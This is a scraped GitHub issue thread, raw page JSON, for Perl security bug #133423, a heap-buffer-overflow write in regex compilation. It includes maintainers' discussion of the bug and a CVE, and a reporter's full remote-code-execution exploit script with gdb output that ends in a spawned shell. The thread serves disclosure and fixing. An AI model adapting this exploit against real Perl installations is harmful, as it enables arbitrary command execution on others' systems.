data-snippet-clipboard-copy-content=\"Resending this as it did not make it to the list\u0026amp;#8203;:\n\nOn Wed\\, 15 Aug 2018 11\u0026amp;#8203;:01\u0026amp;#8203;:24 \\-0700\\, khw wrote\u0026amp;#8203;:\n \u0026gt; I suspect this is a serious security issue\\. One can position where\n \u0026gt; beyond the end of buffer gets written by adding \\\\x80's to the ones\n \u0026gt; already there\\. But I'd be happy to be wrong about this\\.\n \u0026gt;\n \u0026gt; The cause is one branch during the parsing leaves the parse pointer\n \u0026gt; positioned one too far\\, and that causes the backslash to be skipped\n \u0026gt; during pass2\\, which causes a '\\]' to be treated as a metacharacter\n \u0026gt; instead of a literal\\.\n \u0026gt;\n \u0026gt; The fix is to remove the single line that incorrectly increments the\n \u0026gt; parse pointer\\.\n \u0026gt; I don't know that this being an experimental feature has any bearing\n \u0026gt; on it\\.\n \u0026gt;\n \u0026gt; There is another thing\\. The minus sign in this case could have been\n \u0026gt; caught as incorrect\\. But the same out\\-of\\-bounds writes would\noccur if\n \u0026gt; a '^' replaced the minus\\, and that would be a correct use\\.\n \u0026gt;\n \u0026gt; Karl Williamson\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode class=\"notranslate\"\u003eResending this as it did not make it to the list\u0026amp;#8203;:\n\nOn Wed\\, 15 Aug 2018 11\u0026amp;#8203;:01\u0026amp;#8203;:24 \\-0700\\, khw wrote\u0026amp;#8203;:\n \u0026gt; I suspect this is a serious security issue\\. One can position where\n \u0026gt; beyond the end of buffer gets written by adding \\\\x80's to the ones\n \u0026gt; already there\\. But I'd be happy to be wrong about this\\.\n \u0026gt;\n \u0026gt; The cause is one branch during the parsing leaves the parse pointer\n \u0026gt; positioned one too far\\, and that causes the backslash to be skipped\n \u0026gt; during pass2\\, which causes a '\\]' to be treated as a metacharacter\n \u0026gt; instead of a literal\\.\n \u0026gt;\n \u0026gt; The fix is to remove the single line that incorrectly increments the\n \u0026gt; parse pointer\\.\n \u0026gt; I don't know that this being an experimental feature has any bearing\n \u0026gt; on it\\.\n \u0026gt;\n \u0026gt; There is another thing\\. The minus sign in this case could have been\n \u0026gt; caught as incorrect\\. But the same out\\-of\\-bounds writes would\noccur if\n \u0026gt; a '^' replaced the minus\\, and that would be a correct use\\.\n \u0026gt;\n \u0026gt; Karl Williamson\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003c/blockquote\u003e","bodyVersion":"7ec26e223466bc4509f6120c254dddeafd2a1003163b7f5278b927adbd9deac6","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097448","createdAt":"2018-08-30T06:52:16Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZYmanQAAqTU0NDA5NzQ0OA=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097450,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1MA==","body":"### From @tonycoz\n\nOn Wed\\, 15 Aug 2018 11\u0026#8203;:01\u0026#8203;:24 \\-0700\\, khw wrote\u0026#8203;:\n\u003e The cause is one branch during the parsing leaves the parse pointer\n\u003e positioned one too far\\, and that causes the backslash to be skipped\n\u003e during pass2\\, which causes a '\\]' to be treated as a metacharacter\n\u003e instead of a literal\\.\n\u003e \n\u003e The fix is to remove the single line that incorrectly increments the\n\u003e parse pointer\\.\n\u003e I don't know that this being an experimental feature has any bearing\n\u003e on it\\.\n\u003e \n\u003e There is another thing\\. The minus sign in this case could have been\n\u003e caught as incorrect\\. But the same out\\-of\\-bounds writes would occur if\n\u003e a '^' replaced the minus\\, and that would be a correct use\\.\n\nCould you please make patches against blead/maint\\-5\\.28/maint\\-5\\.26 for this?\n\nThanks\\,\nTony","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/tonycoz/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/tonycoz\"\u003e@tonycoz\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eOn Wed, 15 Aug 2018 11:01:24 -0700, khw wrote:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eThe cause is one branch during the parsing leaves the parse pointer\u003cbr\u003e\npositioned one too far, and that causes the backslash to be skipped\u003cbr\u003e\nduring pass2, which causes a ']' to be treated as a metacharacter\u003cbr\u003e\ninstead of a literal.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe fix is to remove the single line that incorrectly increments the\u003cbr\u003e\nparse pointer.\u003cbr\u003e\nI don't know that this being an experimental feature has any bearing\u003cbr\u003e\non it.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThere is another thing. The minus sign in this case could have been\u003cbr\u003e\ncaught as incorrect. But the same out-of-bounds writes would occur if\u003cbr\u003e\na '^' replaced the minus, and that would be a correct use.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eCould you please make patches against blead/maint-5.28/maint-5.26 for this?\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThanks,\u003cbr\u003e\nTony\u003c/p\u003e","bodyVersion":"45d4bafcbd491fcc77ebb66f9c6dc68e9953ae78fa4e436947970e3afd8948d2","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097450","createdAt":"2018-09-20T00:28:43Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZfRhAngAqTU0NDA5NzQ1MA=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097451,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1MQ==","body":"### From @tonycoz\n\nOn Wed\\, 29 Aug 2018 23\u0026#8203;:52\u0026#8203;:16 \\-0700\\, public@\u0026#8203;khwilliamson\\.com wrote\u0026#8203;:\n\u003e On 08/27/2018 07\u0026#8203;:16 AM\\, Eiichi Tsukata wrote\u0026#8203;:\n\u003e \u003e The following code generates a regexp which executes arbitrary\n\u003e \u003e command\n\u003e \u003e during global destruction\\.\n\u003e \u003e It overwrites some SV pointer address to a crafted fake SV on\n\u003e \u003e overwritten heap which has the malicious svt\\_free\\(shell\\_code\\) on its\n\u003e \u003e magic vtable\\.\n\u003e \u003e\n\u003e \u003e Limitations\u0026#8203;:\n\u003e \u003e\n\u003e \u003e \\- must set \\`execstack \\-s\\` to perl\n\u003e \u003e \\- require address leak\\(exact address of overwritten heap\\)\n\u003e \u003e\n\u003e Shouldn't this be getting a CVE?\n\nI plan to request a CVE ID for this issue in the next couple of days\\.\n\nIf anyway has already requested an ID\\, please let me know\\.\n\nThanks\\,\nTony","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/tonycoz/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/tonycoz\"\u003e@tonycoz\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eOn Wed, 29 Aug 2018 23:52:16 -0700, public@khwilliamson.com wrote:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eOn 08/27/2018 07:16 AM, Eiichi Tsukata wrote:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eThe following code generates a regexp which executes arbitrary\u003cbr\u003e\ncommand\u003cbr\u003e\nduring global destruction.\u003cbr\u003e\nIt overwrites some SV pointer address to a crafted fake SV on\u003cbr\u003e\noverwritten heap which has the malicious svt_free(shell_code) on its\u003cbr\u003e\nmagic vtable.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eLimitations:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e - must set `execstack -s` to perl\u003cbr\u003e\n - require address leak(exact address of overwritten heap)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eShouldn't this be getting a CVE?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eI plan to request a CVE ID for this issue in the next couple of days.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIf anyway has already requested an ID, please let me know.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThanks,\u003cbr\u003e\nTony\u003c/p\u003e","bodyVersion":"37c7d0185b15bee6f0f6fa19d0a37ed328613af53dad1ac330a58d053a6109cd","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097451","createdAt":"2018-09-24T06:41:05Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZgpPW-gAqTU0NDA5NzQ1MQ=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097452,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1Mg==","body":"### From @Etsukata\n\n\u003e \u003e Limitations\u0026#8203;:\n\u003e \u003e\n\u003e \u003e \\- must set \\`execstack \\-s\\` to perl\n\nupdate\u0026#8203;: this limitation can be reduced by calling Perl\\_eval\\_sv with crafted\nsv\\_u\\.svu\\_pv\\('system sh'\\) instead of calling the shellcode on heap\\.\nBut so far\\, it still needs address leak\\(overwrite address and\nPerl\\_eval\\_sv\\(\\) address\\)\\.\n\n\\- code\n\n\\`\\`\\`\n\\#\\!/usr/bin/perl\n\n\\#\n\\# RCE exploit PoC for\n\\# \\[perl \\#133423\\] regcomp\u0026#8203;: heap\\-buffer\\-overflow write\n\\#\n\nuse strict;\nuse warnings;\n\n\\# 0xabcd =\u003e '\\\\xcd\\\\xab\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00'\nsub h2s \\{\n\u0026nbsp; my $h = shift;\n\u0026nbsp; my $sz = shift;\n\u0026nbsp; my $ret = '';\n\u0026nbsp; for \\(0\\.\\.\\($sz \\- 1\\)\\) \\{\n\u0026nbsp; $ret \\.= sprintf\\(\"\\\\\\\\x%02x\"\\, \\(\\($h \u003e\u003e \\(8 \\* $\\_\\)\\) \u0026 0xff\\)\\);\n\u0026nbsp; \\}\n\u0026nbsp; return $ret\n\\}\n\nmy $cmd = 'gdb \\-x gdbcmd \\-q \\-\\-args\n~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-e ';\nmy $prefix = '\\\\'my $r = \"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\\\\\\\\\a\\]\\)\\)\\\\\\\\\\\\\\\\\\]X';\n\nmy $addr = 0xbacbfc; \\# overwrite start addr\n\u0026nbsp; \\# search with\u0026#8203;:\n\u0026nbsp; \\# \\(gdb\\) b regcomp\\.c\u0026#8203;:13904\n\u0026nbsp; \\# \\(gdb\\) p s\n\u0026nbsp; \\# \\[CAUTION\\] must not contain '\\]' \\(0x5d\\)\n\u0026nbsp; \\#\nmy $addr\\_sv\\_any = $addr \\+ 8 \\+ 4 \\+ 4 \\+ 8;\nmy $addr\\_stash = $addr\\_sv\\_any \\+ 8 \\+ 8 \\+ 8;\nmy $addr\\_stash\\_any = $addr\\_stash \\+ 8 \\+ 4 \\+ 4;\nmy $addr\\_magic = $addr\\_stash \\+ 8 \\+ 4 \\+ 4 \\+ 8 \\+ 8 \\+ 20 \\+ 8;\nmy $addr\\_mg\\_virtual = $addr\\_magic \\+ 8 \\+ 8 \\+ 2 \\+ 1 \\+ 1 \\+ 8 \\+ 8 \\+ 8;\n\n\\# $ nm /path/to/perl | grep Perl\\_eval\\_sv\nmy $addr\\_eval\\_sv = 0x46a576;\nmy $addr\\_system\\_sh = $addr\\_stash\\_any \\+ 8 \\+ 8;\n\nmy $body = ''\n\n\\# sv\\($addr\\) obj\n\\. h2s\\($addr\\_sv\\_any\\, 8\\)\n\\. h2s\\(0x01\\, 4\\) \\# sv\\_refcnt\n\n\\# sv\\_flags\n\\# \\- SVt\\_PVMG || SVs\\_OBJECT : to call SvREFCNT\\_dec\\_NN at\ndo\\_clean\\_named\\_objs\\(\\)\n\\# \\- SVf\\_POK || SVp\\_POK : to use as SVPV in eval\\_sv\n\\. h2s\\(0x104407\\, 4\\)\n\n\\# sv\\_u\\.svu\\_pv : ptr to \"system sh\"\n\\. h2s\\($addr\\_system\\_sh\\, 8\\)\n\n\\# any\\($addr\\_sv\\_any\\)\n\\. h2s\\($addr\\_stash\\, 8\\) \\# HV\\* xmg\\_stash\n\\. h2s\\($addr\\_magic\\, 8\\) \\# union \\_xmgu xmg\\_u \\(MAGIC\\* xmg\\_magic\\)\n\\. h2s\\(length\\(\"system sh\"\\)\\, 8\\) \\# STRLEN xpv\\_cur\n\n\\#\\# xmg\\_stash\\($addr\\_stash\\)\n\\. h2s\\($addr\\_stash\\_any\\, 8\\) \\# sv\\_any\n\\. h2s\\(0x02\\, 4\\) \\# sv\\_refcnt \\(not 0x01\u0026#8203;: SVt\\_PVHV can not\nbypass assertion in eval\\_sv\\)\n\\. h2s\\(0x0c\\, 4\\) \\# sv\\_flags \\(SVt\\_PVHV\\)\n\\#\\# any\\($addr\\_stash\\_any\\)\n\\. h2s\\(0x00\\, 8\\) \\# HV\\* xmg\\_stash\n\\. h2s\\($addr\\_magic\\, 8\\) \\# union \\_xmgu xmg\\_u \\(MAGIC\\* xmg\\_magic\\)\n\n\\# $addr\\_system\\_sh\n\\. \"system sh\\\\\\\\x00\"\n\n\\. \"A\" x 10 \\# padding\n\\. h2s\\($addr\\, 8\\) \\# OVERWRITE gvp \\(addr \\+ 100\\)\n\n\\# xmg\\_magic\\($addr\\_magic\\)\n\\. h2s\\(0x00\\, 8\\) \\# MAGIC\\* mg\\_moremagic;\n\\#\n\\. h2s\\($addr\\_mg\\_virtual\\, 8\\) \\# MGVTBL\\* mg\\_virtual /\\* pointer to magic\nfunctions \\*/\n\\#\n\\. h2s\\(0x00\\, 2\\) \\# U16 mg\\_private;\n\\. h2s\\(0x00\\, 1\\) \\# char mg\\_type;\n\\. h2s\\(0x00\\, 1\\) \\# U8 mg\\_flags;\n\\. h2s\\(0x00\\, 8\\) \\# SSize\\_t mg\\_len;\n\\. h2s\\(0x00\\, 8\\) \\# SV\\* mg\\_obj;\n\\. h2s\\(0x00\\, 8\\) \\# char\\* mg\\_ptr;\n\\#\n\\#\\# mg\\_virual\\($addr\\_mg\\_virtual\\)\n\\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_get\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_set\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. h2s\\(0x00\\, 8\\) \\# U32 \\(\\*svt\\_len\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_clear\\)\\(pTHX\\_ SV \\*sv\\, MAGIC\\* mg\\);\n\\. h2s\\($addr\\_eval\\_sv\\, 8\\) \\# int \\(\\*svt\\_free\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. '\\]\\)'\n\\. \"B\" x 20 \\# control gvp allocation\n\\. '\"; qr/$r/\\\\'';\n\nmy $payload = $prefix \\. $body;\n\nprint $cmd \\. $payload \\. \"\\\\n\";\n\\`\\`\\`\n\n\\- output\n\n\\`\\`\\`\n\\[eiichi@\u0026#8203;x1 exploit\\]$ cat gdbcmd\nb regcomp\\.c\u0026#8203;:13904\nrun\nl\np s\ndis br 1\nc\n\n\\[eiichi@\u0026#8203;x1 exploit\\]$ gdb \\-x gdbcmd \\-q \\-\\-args\n~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-e 'my $r =\n\"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]X\\\\x14\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x44\\\\x10\\\\x00\\\\x4c\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x2c\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x68\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x09\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x68\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00system\nsh\\\\x00AAAAAAAAAA\\\\xfc\\\\xcb\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x94\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x76\\\\xa5\\\\x46\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\]\\)BBBBBBBBBBBBBBBBBBBB\";\nqr/$r/'\nReading symbols from\n/home/eiichi/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl\\.\\.\\.done\\.\nBreakpoint 1 at 0x5395ed\u0026#8203;: file regcomp\\.c\\, line 13904\\.\n\\[Thread debugging using libthread\\_db enabled\\]\nUsing host libthread\\_db library \"/lib64/libthread\\_db\\.so\\.1\"\\.\nwarning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\nwarning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[ \\\u003c\\-\\- HERE \\(?x\u0026#8203;:\\(?\\[\\\\a\\]\\)\\)\\\\\\]X̺DL̺\\,̺h̺ \\\u003c̺\n\n\u0026nbsp; h̺system\nshAAAAAAAAAA?˺?̺v?F\\]\\)BBBBBBBBBBBBBBBBBBBB/ at \\-e line 1\\.\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[\\(?x\u0026#8203;:\\(?\\[ \\\u003c\\-\\- HERE \\\\a\\]\\)\\)\\\\\\]X̺DL̺\\,̺h̺ \\\u003c̺\n\n\u0026nbsp; h̺system\nshAAAAAAAAAA?˺?̺v?F\\]\\)BBBBBBBBBBBBBBBBBBBB/ at \\-e line 1\\.\n\nBreakpoint 1\\, S\\_regatom \\(pRExC\\_state=0x7fffffffcc80\\, flagp=0x7fffffffc220\\,\ndepth=4\\) at regcomp\\.c\u0026#8203;:13904\n13904 \\*\\(s\\+\\+\\) = \\(char\\) ender;\n13899 U8 \\* new\\_s = uvchr\\_to\\_utf8\\(\\(U8\\*\\)s\\,\nender\\);\n13900 added\\_len = \\(char \\*\\) new\\_s \\- s;\n13901 s = \\(char \\*\\) new\\_s;\n13902 \\}\n13903 else \\{\n13904 \\*\\(s\\+\\+\\) = \\(char\\) ender;\n13905 \\}\n13906 \\}\n13907 \\}\n13908 else if \\(LOC \u0026\u0026\nis\\_PROBLEMATIC\\_LOCALE\\_FOLD\\_cp\\(ender\\)\\) \\{\n$1 = 0xbacbfc \"\"\npanic\u0026#8203;: reg\\_node overrun trying to emit 0\\, baccc0\u003e=bacc14 at \\-e line 1\\.\nDetaching after fork from child process 12813\\.\nsh\\-4\\.4$ date\n2018年 9月 24日 月曜日 19\u0026#8203;:11\u0026#8203;:34 JST\n\\`\\`\\`\n\n2018年9月24日\\(月\\) 15\u0026#8203;:41 Tony Cook via RT \\\u003c\nperl5\\-security\\-report\\-followup@\u0026#8203;perl\\.org\u003e\u0026#8203;:\n\n\u003e On Wed\\, 29 Aug 2018 23\u0026#8203;:52\u0026#8203;:16 \\-0700\\, public@\u0026#8203;khwilliamson\\.com wrote\u0026#8203;:\n\u003e \u003e On 08/27/2018 07\u0026#8203;:16 AM\\, Eiichi Tsukata wrote\u0026#8203;:\n\u003e \u003e \u003e The following code generates a regexp which executes arbitrary\n\u003e \u003e \u003e command\n\u003e \u003e \u003e during global destruction\\.\n\u003e \u003e \u003e It overwrites some SV pointer address to a crafted fake SV on\n\u003e \u003e \u003e overwritten heap which has the malicious svt\\_free\\(shell\\_code\\) on its\n\u003e \u003e \u003e magic vtable\\.\n\u003e \u003e \u003e\n\u003e \u003e \u003e Limitations\u0026#8203;:\n\u003e \u003e \u003e\n\u003e \u003e \u003e \\- must set \\`execstack \\-s\\` to perl\n\u003e \u003e \u003e \\- require address leak\\(exact address of overwritten heap\\)\n\u003e \u003e \u003e\n\u003e \u003e Shouldn't this be getting a CVE?\n\u003e\n\u003e I plan to request a CVE ID for this issue in the next couple of days\\.\n\u003e\n\u003e If anyway has already requested an ID\\, please let me know\\.\n\u003e\n\u003e Thanks\\,\n\u003e Tony\n\u003e","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/Etsukata/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/Etsukata\"\u003e@Etsukata\u003c/a\u003e\u003c/h3\u003e\n\u003cblockquote\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eLimitations:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- must set `execstack -s` to perl\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eupdate: this limitation can be reduced by calling Perl_eval_sv with crafted\u003cbr\u003e\nsv_u.svu_pv('system sh') instead of calling the shellcode on heap.\u003cbr\u003e\nBut so far, it still needs address leak(overwrite address and\u003cbr\u003e\nPerl_eval_sv() address).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- code\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e```\u003cbr\u003e\n#!/usr/bin/perl\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e#\u003cbr\u003e\n# RCE exploit PoC for\u003cbr\u003e\n# [perl #133423] regcomp: heap-buffer-overflow write\u003cbr\u003e\n#\u003c/p\u003e\n\u003cp dir=\"auto\"\u003euse strict;\u003cbr\u003e\nuse warnings;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# 0xabcd =\u0026gt; '\\xcd\\xab\\x00\\x00\\x00\\x00\\x00\\x00'\u003cbr\u003e\nsub h2s {\u003cbr\u003e\n my $h = shift;\u003cbr\u003e\n my $sz = shift;\u003cbr\u003e\n my $ret = '';\u003cbr\u003e\n for (0..($sz - 1)) {\u003cbr\u003e\n $ret .= sprintf(\"\\\\x%02x\", (($h \u0026gt;\u0026gt; (8 * $_)) \u0026amp; 0xff));\u003cbr\u003e\n }\u003cbr\u003e\n 